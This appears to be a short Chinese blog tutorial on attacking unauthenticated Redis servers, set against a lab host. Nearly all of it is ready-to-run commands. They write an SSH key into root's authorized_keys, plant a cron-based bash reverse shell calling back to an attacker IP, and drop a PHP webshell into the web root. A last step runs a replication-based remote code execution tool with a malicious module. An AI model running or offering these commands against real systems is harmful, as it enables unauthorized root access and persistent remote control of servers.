vlambda博客
学习文章列表

一分钟可以看完的Redis漏洞攻击

  • 环境搭建

在虚拟机中搭建redis服务 

  • 测试连接

一分钟可以看完的Redis漏洞攻击

写ssh-keygen公钥登陆

  • 首先在本地生产公私钥文件

 
   
   
 
  1. ssh-keygen t rsa

一分钟可以看完的Redis漏洞攻击

  • 公钥写入 key.txt 文件

 
   
   
 
  1. (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt

一分钟可以看完的Redis漏洞攻击

  • 连接 Redis 写入文件

 
   
   
 
  1. cat test.txt | redis-cli -h 192.168.1.103 -x set crackit

  2. redis-cli -h 192.168.1.103

  3. config set dir /root/.ssh/

  4. config get dir

  5. config set dbfilename "authorized_keys"

  6. save

一分钟可以看完的Redis漏洞攻击

  • 私钥登陆

 
   
   
 
  1. ssh -i id_rsa root@192.168.1.103

一分钟可以看完的Redis漏洞攻击

利用计划任务执行命令反弹shell

  • 监听一个端口

 
   
   
 
  1. nc -lvvp 6666

一分钟可以看完的Redis漏洞攻击

  • 写入反弹shell

 
   
   
 
  1. set x "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.1.101/6666 0>&1\n\n"

  2. config set dir /var/spool/cron/

  3. config set dbfilename root

  4. save

一分钟可以看完的Redis漏洞攻击

  • 反弹shell

一分钟可以看完的Redis漏洞攻击

WEB目录写webshell

  • 写shell

 
   
   
 
  1. config set dir /var/www/html/

  2. config set dbfilename shell.php

  3. set x "<?php phpinfo();?>"

  4. save

一分钟可以看完的Redis漏洞攻击

一分钟可以看完的Redis漏洞攻击

基于主从复制的RCE

  • 影响范围

 
   
   
 
  1. Redis 4.x/5.x

 
   
   
 
  1. https://github.com/jas502n/Redis-RCE.git

  • 主从利用

 
   
   
 
  1. python redis-rce.py -r 192.168.1.103 -p 6379 -L 192.168.1.101 -f exp_lin.so